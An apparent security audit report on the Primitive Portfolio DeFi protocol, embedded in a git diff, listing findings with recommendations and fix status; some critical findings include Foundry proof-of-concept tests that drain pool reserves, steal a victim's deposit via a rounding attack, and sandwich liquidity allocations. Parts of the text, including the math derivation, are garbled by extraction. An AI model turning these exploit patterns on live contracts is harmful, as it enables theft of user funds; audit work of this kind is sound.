Primitive: Commit fix commit 797457. This was then adjusted to remove the unnecessary computations in getSwapInvariant: commit a39126. Spearbit: Fixed in beforeSwap because the calls changed. fixed in getAmountOut. +5.5.5 AfterCreate event uses wrong durationSeconds value if pool is perpetual Severity: Informational Context: NormalStrategy.sol#L74, NormalStrategyLib.sol#L408 Description: The AfterCreate uses the cached config.durationSeconds value but the real value the config storage struct is initialized with will be SECONDS_PER_YEAR in the case of perpetual pools. Recommendation: Consider reading the durationSeconds value from the config storage var configs[poolId] instead. Primitive: Fixed in commit 8e645a. Spearbit: Fixed. +5.5.6 Unnecessary fee reserves check Severity: Informational Context: SwapLib.sol#L119 Description: The fee amount is always taken on the input and the fee percentage is always less than 100%. Therefore, the fee is always less than the input. The following check should never fail adjustedInputReserveWad += self.input; // feeAmountUnit <= self.input <= adjustedInputReserveWad if (feeAmountUnit > adjustedInputReserveWad) revert SwapLib_FeeTooHigh(); Recommendation: Consider removing the check and adding a comment instead explaining why the fee is always included in the adjusted reserve and the subtraction doesn't underflow. Primitive: Fixed in commit 728b04. 17 Spearbit: Fixed. 18 diff --git a/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt new file mode 100644 index 0000000..1d843da --- /dev/null +++ b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review.txt @@ -0,0 +1,38 @@ +5.1.1 Protocol fees are double-counted as registry balance and pool reserve Severity: Critical Risk Context: Portfolio.sol#L489-L507 Description: When swapping, the registry is credited a protocolFee. However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registry’s user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw them. If users and LPs decide to withdraw all their balances, the registry can’t withdraw their fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, ,! uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying _entire_ reserve including protocol fees ,! subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); 5 assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } } Recommendation: To avoid double-counting the protocol fee, it may not be reinvested in the pool if it is credited to the registry, for both invariant >= 0 and invariant < 0 cases. It must be removed from deltaInput and deltaInputLessFee when computing the next virtualX / virtualY candidates: // pseudo-code nextIndependent = liveIndependent + (deltaInput - protocolFee).divWadDown(iteration.liquidity); // deltaInputLessFee still includes the protocolFee, only the LP fee was removed. nextIndependentLessFee = liveIndependent + (deltaInputLessFee - protocolFee).divWadDown(iteration.liquidity); Primitive: Fixed in PR 335. Spearbit: The fix implements the recommendation. +5.1.2 LP fees are in WAD instead of token decimal units Severity: Critical Risk Context: Portfolio.sol#L485 Description: When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD per liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( feeGrowthAsset=pool.feeGrowthGlobalAsset, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity) and they have credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets) which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units and tokens with fewer than 18 decimals can be stolen from the protocol. 6 // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values. create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { } // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, "token-credit"); uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0) ) ); subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, "tokens-owed"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, ,! "post-draw-balance-mismatch"); 7 } } Recommendation: Generally, some quantities are in WAD units and some in token decimals throughout the pro- tocol. We recommend using WAD units everywhere and only converting from/to token decimal units at the "token boundary", directly at the point of interaction with the token contract through a transfer/transferFrom/balanceOf call. Primitive: Resolved in PR 320. Spearbit: Fixed. +5.1.3 Swaps can be done for free and steal the reserve given large liquidity allocation Severity: Critical Risk Context: Portfolio.sol#L509 Description: A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pool’s new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput as the reserves are unchanged. The swapper will be credited deltaOutput tokens. The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC): This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent computed - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). as 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesn’t require any token settlement. 4. settlement is called and the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack 8 is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "contracts/libraries/RMM01Lib.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap ,! address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() ,! // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 ,! / virtualY. 9 // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) ,! // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) ,! // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); ,! instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log("attacker asset profit: %s", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, "attacker-post-draw-balance-mismatch"); vm.stopPrank(); } } Recommendation: Note that in the swap step the virtualX and virtualY pool reserves are intentionally chosen to remain unchanged but the global reserves (__account__.reserve) decrease. The sum of the on-protocol user balances is now greater than the actual global reserves that can be withdrawn. The attacker can withdraw first and LPs will incur the loss unable to withdraw their on-protocol balance. This is a general problem with the protocol as a single issue in one pool spills over to all pools and user credit balances. The pool’s actual reserves are not siloed, they are not even tracked (only indirectly through pool.liquidity * pool.virtualX / 1e18). This risk is further enhanced as pool creation is permissionless and allows attacker-controlled malicious tokens. Think about possible ways to silo the pool risk. This probelm stems form the fact that the global reserves are tracked in token units while the pool reserves are tracked only indirectly as pool reserves per liquidity with virtualX/Y. These are completely different scales and they can drift apart in order of magnitudes over time leading to the attack. This can easily be seen when looking at allocate: it increases the global reserve with increaseReserve but doesn’t touch the virtualX/Y pool reserves per liquidity at all. What should ideally happen in a swap is that the global reserves increase/decrease by the exact same amounts the pool reserves increase/decrease. Currently, the global reserves are changed by _in- creaseReserves(_state.tokenInput, iteration.input) and _decreaseReserves(_state.tokenOutput, it- eration.output) but this is decoupled from the actual pool reserve changes as can be seen from the attack. (The pool reserves don’t change at all because liquidity’s magnitude is not in any way proportional to virtualX, the reconstructed pool reserves virtualX * pool.liquidity / 1e18 don’t change in the swap attack.) A proper fix would be resolve this discrepancy in global and pool reserve changes. This can be achieved by tracking the pool reserves in the same units as the global reserves, instead of tracking a reserves per liquidity value. Instead of virtualX reserve per liquidity, one would store reserveX in token decimals (or WADs). Then in 10 swap one reduces both the global reserve and pool reserve by the same amount, mitigating this kind of rounding attack and properly addressing the other concern of siloing the pools. _increaseReserves(_state.tokenInput, iteration.input); _decreaseReserves(_state.tokenOutput, iteration.output); _syncPool( args.poolId, state.tokenInput iteration.input, // increases pool reserve by the same amount as global reserves now state.tokenOutput iteration.output, // decreases pool reserve by the same amount as global reserves now ... ); // we can be much more confident that the swap only traded out an amount that was actually in the pool ,! reserves Now, with global and pool reserves decreasing by the same amount, we can be much more confident that the pools are properly siloed, a swap can only pay out what was actually allocated to the pool. One should also be able to prove important invariants now, like global reserves >= sum of pool reserves + sum of user balances + sum of tokens owed, which was violated by all critical attacks. The only issue is that this is a non-trivial change, every time virtualX is used in the current code, it needs to be re- computed as pool.reserveX * 1e18 / pool.liquidity (or with an even higher precision than 1e18). One would also need to change the pool reserves in allocate / deallocate along the global reserve increase/decrease. The biggest change will probably be rewriting the getLiquidityDeltas function, especially the first liquidity provision when liquidity == 0 and the start price. There might be other issues that come with this (the standard ERC4626 first depositor issue, etc.) but it seems like the proper way to be sure the pool reserves remain consistent with global reserves. Might be worth exploring where these changes lead and what potential new issues arise. Spearbit: Marking as Acknowledged, as this leads to the extension period. 5.2 High Risk +5.2.1 Unsafe type-casting Severity: High Risk Context: See below Description: Throughout the contract we’ve encountered various unsafe type-castings. • invariant Within the _swap function, the next invariant is a int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable then is dangerously typecasted to int128 and assigned to a int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in a int128, in case it won’t fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. • iteration.nextInvariant • _getLatestInvariantAndVirtualPrice • getNetBalance During account settlement, getNetBalance is called to compute the difference between the "physical reserves" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesn’t have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here as a legitimate possible revert would cause less issues than an actual overflow. • getNetBalance 11 • Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. • encodeJumpInstruction: cannot encode more than 255 instructions, instructions will be cut off and they might perform an action that will then be settled unfavorably. • decodeClaim: fee0/fee1 can overflow • decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and pool is initialized wrong • decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow would pro- vide less liquidity • decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially lead to unfavor- able swaps • Other • PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast, the function is not used internally. • AssemblyLib.toAmount: The typecast works if power < 39, otherwise leads to wrong results without revert- ing. This function is not used yet but consider performing a safe typecast here. Recommendation: We recommend using safe type-casts that check if the value fits into the new type’s range as the default. For the invariant down-cast to int128, it is unclear why it is needed as all computations involving invariants are performed on int256 anyways, the only discrepancy being in the Swap event. Consider removing the down-casting as all of the logic deals with int256. Spearbit: Marked as Acknowledged. PR 307 fixed some unsafe typecasts in the decoding but not all. The length and subsequent shift computations can still underflow for bad/malicious encodings. Underflows in decod- ings shouldn’t be as severe though because honest users should use the provided encoding functions. PR 321 addresses the rest. +5.2.2 Protocol fees are in WAD instead of token decimal units Severity: High Risk Context: Portfolio.sol#L489 Description: When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has less than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token. Recommendation: Generally, some quantities are in WAD units and some in token decimals throughout the pro- tocol. We recommend using WAD units everywhere and only converting from/to token decimal units at the "token boundary", directly at the point of interaction with the token contract through a transfer/transferFrom/balanceOf call. 12 Primitive: Resolved in PR 335. Spearbit: Fixed. +5.2.3 Invariant.getX computation is wrong Severity: High Risk Context: solstat/Invariant.sol#L114-L140, RMM01Lib.sol#L70 Description: The protocol makes use of a solstat library to compute the off-chain swap amounts. The solstat’s Invariant.getX function documentation states: Computes x in x = 1 - Φ(Φ¹( (y + k) / K ) + στ). However, the y + k term should be y - k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. Derivation: y = K (cid:8) (cid:0)(cid:8)(cid:0)1(1 (cid:8)(cid:0)1(y (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x) (cid:27)p(cid:28) (cid:1) + k (cid:0) (cid:0) k )=K = (cid:8)(cid:0)1(1 x) (cid:27)p(cid:28) (cid:0) k)=K + (cid:27)p(cid:28) (cid:1) = 1 (cid:0) x (cid:0) (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x = 1 Recommendation: Change the comment and the computation to use y - k: k )=K + (cid:27)p(cid:28) (cid:1) (cid:0) (cid:0) /** - + * @notice Uses reserves `R_y` to compute reserves `R_x`. * @dev Computes `x` in `x = 1 - Φ(Φ¹( (y + k) / K ) + στ)`. * @dev Computes `x` in `x = 1 - Φ(Φ¹( (y - k) / K ) + στ)`. * Not used in invariant function. Used for computing swap outputs. * Simplifies to `1 - ( (y + k) / K )` when time to expiry is zero. * Reverts if `R_y` is greater than one. Units are WAD. * * Dangerous! There are important bounds to using this function. * * ... */ function getX(uint256 R_y, uint256 stk, uint256 vol, uint256 tau, int256 inv) internal pure returns ,! (uint256 R_x) { // Short circuits because tau != 0 is more likely. if (tau != 0) { uint256 sec = tau.divWadDown(uint256(YEAR)); uint256 sdr = sec.sqrt(); sdr = sdr * uint256(HALF_SCALAR); sdr = vol.mulWadDown(sdr); int256 phi = diviWad(int256(R_y) + inv, int256(stk)); int256 phi = diviWad(int256(R_y) - inv, int256(stk)); - + } ... Consider adding more differential fuzz tests for the following scenarios: • invariant < 0 • invariant > 0 13 Primitive: Resolved in PR 32. Spearbit: Fixed. +5.2.4 Liquidity can be (de-)allocated at a bad price Severity: High Risk Context: Portfolio.sol#L295-L296 Description: To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The re- quired deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that, the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y). // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "contracts/libraries/RMM01Lib.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), 14 poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1. MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( "victim used asset/quote for allocate: %s \t %y \t %s", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3. MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors ,! amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( "MEV asset/quote profit: %s \t %s", mev_asset_balance - initialBalance, mev_quote_balance - ,! initialBalance ); } 15 } Recommendation: Consider adding maxDeltaAsset and maxDeltaQuote parameters to allocate. If any of these parameters is exceeded, revert the allocation. The same issue can happen with de-allocate, consider adding minDeltaAsset and minDeltaQuote amounts for it. If any of these parameters fall short, revert the deallocation. Primitive: Resolved by implementing minAmount / maxAmount in PR 307. Spearbit: Fixed. 5.3 Medium Risk +5.3.1 Missing signextend when dealing with non-full word signed integers Severity: Medium Risk Context: AssemblyLib.sol#L83 Description: The AssemblyLib is using non-full word signed integers operations. If the signed data in the stack have not been signextend the two’s complement arithmetic will not work properly, most probably reverting. The solidity compiler does this cleanup but this cleanup is not guaranteed to be done while using the inline assem- bly. Recommendation: Consider to signextend the data before the data is used, e.g. delta := signextend(15, delta) or just use solidity instead of in-line assembly. Primitive: The team decided to remove the Assembly code and simply use Solidity. A lot of different cases were possible and covering all of them in Assembly was eventually costing more in the end. Addressed in PR 319. Spearbit: Fixed. +5.3.2 Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf Severity: Medium Risk Context: AccountLib.sol#L230 Description: Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulat- ing the same underlying storage (such as Synthetix tokens like SNX and sBTC and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple entrypoint tokens are not safe to be used in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double entrypoint token, crediting the attacker and transferring them the entire balance of the double entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double entrypoint tokens will cancel out. Recommendation: At a minimum, anyone interacting with contracts derived from PortfolioVirtual should be explicitly warned not to create pools containing tokens with multiple valid addresses. An explicit blacklist could be added to prevent any address other than an "official" one from being used to create pairs and pools for such tokens (potentially fixed at deployment time, as double entrypoint tokens are rare and now widely known to be dangerous). Architecturally, tokens could be stored in dedicated, special-purpose contracts for each token address, although this would increase gas costs and complexity. Spearbit: Marked as Acknowledged. 16 +5.3.3 Swap amounts are always estimated with priority fee Severity: Medium Risk Context: RMM01Lib.sol#L70, Portfolio.sol#L416 Description: A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually less than the normal fee, the input amount will be underestimated for non-controllers and the input amount will be too low and the swap reverts. Recommendation: Apply the priority fee only if the swapper is the controller. It might be useful to extend getA- mountOut with an additional address parameter indicating the swap caller. This is because when the swap amounts are estimated offchain using eth_call, the msg.sender defaults to the zero address. Alternatively, use eth_call’s from parameter. Note that adding the parameter to the function might still be useful for other smart contracts that want to estimate swaps. Primitive: Decided to follow the recommendation and add an extra parameter to getAmountOut and the related functions PR 312. Spearbit: Resolved. +5.3.4 Rounding functions are wrong for negative integers Severity: Medium Risk Context: AssemblyLib.sol#L297, RMM01Portfolio.sol#L139-L143 Description: The AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. The scaleFromWadDownSigned only performs a truncations, rounding negative integers towards zero. This function is used in checkInvariant to ensure the new invariant is not less than the new invariant in a swap: int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote); int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned( pools[poolId].pair.decimalsQuote ); nextInvariantWad >= liveInvariantWad It can happen for quote tokens with fewer decimals, for example, 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero. And nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units. Recommendation: Consider properly rounding negative integers towards negative infinity in scaleFromWadDown- Signed and towards positive infinity in scaleFromWadUpSigned. Add tests for these functions to ensure they work correctly on negative integers. Primitive: Fixed in PR 326. Spearbit: Fixed. 17 +5.3.5 LPs can lose fees if fee growth accumulator overflows their checkpoint Severity: Medium Risk Context: PortfolioLib.sol#L215-L224 Description: Fees (that are not reinvested in the pool) are currently tracked through an accumulator value pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the user’s checkpoint is computed and multiplied by their liquidity. The accumu- lator values are deliberately allowed to overflow as only the distance matters. However, if an LP does not sync its fees and the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example: • User allocates at pool.feeGrowthGlobalAsset = 1000e36 • pool.feeGrowthGlobalAsset grows and overflows to 0. differenceAsset is still accurate. • 